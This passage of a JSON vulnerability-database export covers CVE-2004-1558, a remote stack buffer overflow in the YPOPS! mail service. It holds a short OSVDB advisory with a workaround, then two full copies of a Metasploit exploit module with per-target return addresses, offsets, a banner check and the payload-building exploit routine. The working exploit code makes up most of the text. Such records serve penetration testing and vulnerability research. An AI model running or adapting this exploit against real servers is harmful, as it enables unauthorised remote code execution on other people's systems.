"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:05", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in YPOPS!. YPOPS! fails to validate input on POP3 requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Disable the SMTP service and bind only the POP3 service to the loopback interface.\n## Short Description\nA remote overflow exists in YPOPS!. YPOPS! fails to validate input on POP3 requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## References:\nSecurity Tracker: 1011426\n[Secunia Advisory ID:12660](https://secuniaresearch.flexerasoftware.com/advisories/12660/)\n[Related OSVDB ID: 10367](https://vulners.com/osvdb/OSVDB:10367)\nOther Advisory URL: http://www.hat-squad.com/en/000075.html\nMail List Post: http://attrition.org/pipermail/vim/2006-October/001089.html\nISS X-Force ID: 17515\n[CVE-2004-1558](https://vulners.com/cve/CVE-2004-1558)\nBugtraq ID: 11256\n", "modified": "2004-09-27T00:00:00", "published": "2004-09-27T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:10366", "id": "OSVDB:10366", "type": "osvdb", "title": "YahooPOPS POP3 Service USER Command Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-06-12T00:48:40", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the YPOPS POP3 service. This is a classic stack buffer overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll\n", "modified": "2017-07-24T13:26:21", "published": "2006-10-12T03:24:31", "id": "MSF:EXPLOIT/WINDOWS/SMTP/YPOPS_OVERFLOW1", "href": "", "type": "metasploit", "title": "YPOPS 0.6 Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Smtp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'YPOPS 0.6 Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the YPOPS POP3\n service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll\n },\n 'Author' => [ 'acaro <acaro[at]jervus.it>' ],\n 'References' =>\n [\n [ 'CVE', '2004-1558'],\n [ 'OSVDB', '10367'],\n [ 'BID', '11256'],\n [ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],\n ],\n 'Platform' => 'win',\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1200,\n 'BadChars' => \"\\x00\\x25\",\n 'MinNops' => 106,\n },\n 'Targets' =>\n [\n [ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],\n [ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],\n [ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],\n [ 'Windows 2000 SP0 English', { 'Ret' => 0x75036113, 'Offset' => 503 }, ],\n [ 'Windows 2000 SP1 English', { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],\n [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],\n [ 'Windows 2000 SP3 English', { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],\n [ 'Windows 2000 SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],\n [ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],\n [ 'Windows XP SP2 English', { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],\n [ 'Windows 2003 SP0 English', { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],\n [ 'Windows 2003 SP1 English', { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],\n ],\n 'DisclosureDate' => 'Sep 27 2004'))\n end\n\n def check\n connect\n disconnect\n\n banner.gsub!(/\\n/, '')\n\n if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/\n vprint_status(\"Vulnerable SMTP server: #{banner}\")\n return Exploit::CheckCode::Detected\n end\n\n vprint_status(\"Unknown SMTP server: #{banner}\")\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n pattern =\n rand_text_alpha(target['Offset'] - payload.encoded.length) +\n payload.encoded +\n [target.ret].pack('V') +\n \"\\n\"\n\n print_status(\"Trying #{target.name} using jmp ebx at #{\"0x%.8x\" % target.ret}\")\n\n sock.put(pattern)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smtp/ypops_overflow1.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:07", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83157/YPOPS-0.6-Buffer-Overflow.html", "id": "PACKETSTORM:83157", "type": "packetstorm", "title": "YPOPS 0.6 Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Smtp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'YPOPS 0.6 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the YPOPS POP3 \nservice. \n \nThis is a classic stack overflow for YPOPS version 0.6. \nPossibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to \njmp ebx opcode in ws_32.dll \n \n}, \n'Author' => [ 'acaro <acaro@jervus.it>' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2004-1558'], \n[ 'OSVDB', '10367'], \n[ 'BID', '11256'], \n[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'], \n \n], \n'Platform' => 'win', \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1200, \n'BadChars' => \"\\x00\\x25\", \n'MinNops' => 106, \n \n}, \n'Targets' => \n[ \n[ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ], \n[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ], \n[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ], \n[ 'Windows 2000 SP0 English', { 'Ret' => 0x75036113, 'Offset' => 503 }, ], \n[ 'Windows 2000 SP1 English', { 'Ret' => 0x750317b2, 'Offset' => 503 }, ], \n[ 'Windows 2000 SP2 English', { 'Ret' => 0x7503435b, 'Offset' => 503 }, ], \n[ 'Windows 2000 SP3 English', { 'Ret' => 0x750322f3, 'Offset' => 503 }, ], \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 503 }, ], \n[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ], \n[ 'Windows XP SP2 English', { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ], \n[ 'Windows 2003 SP0 English', { 'Ret' => 0x71c04202, 'Offset' => 503 }, ], \n[ 'Windows 2003 SP1 English', { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ], \n], \n'DisclosureDate' => 'Sep 27 2004')) \nend \n \ndef check \nconnect \ndisconnect \n \nbanner.gsub!(/\\n/, '') \n \nif banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/ \nprint_status(\"Vulnerable SMTP server: #{banner}\") \nreturn Exploit::CheckCode::Detected \nend \n \nprint_status(\"Unknown SMTP server: #{banner}\") \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \npattern = \nrand_text_alpha(target['Offset'] - payload.encoded.length) + \npayload.encoded + \n[target.ret].pack('V') + \n\"\\n\" \n \nprint_status(\"Trying #{target.name} using jmp ebx at #{\"0x%.8x\" % target.ret}\") \n \nsock.put(pattern) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83157/ypops_overflow1.rb.txt"}]}
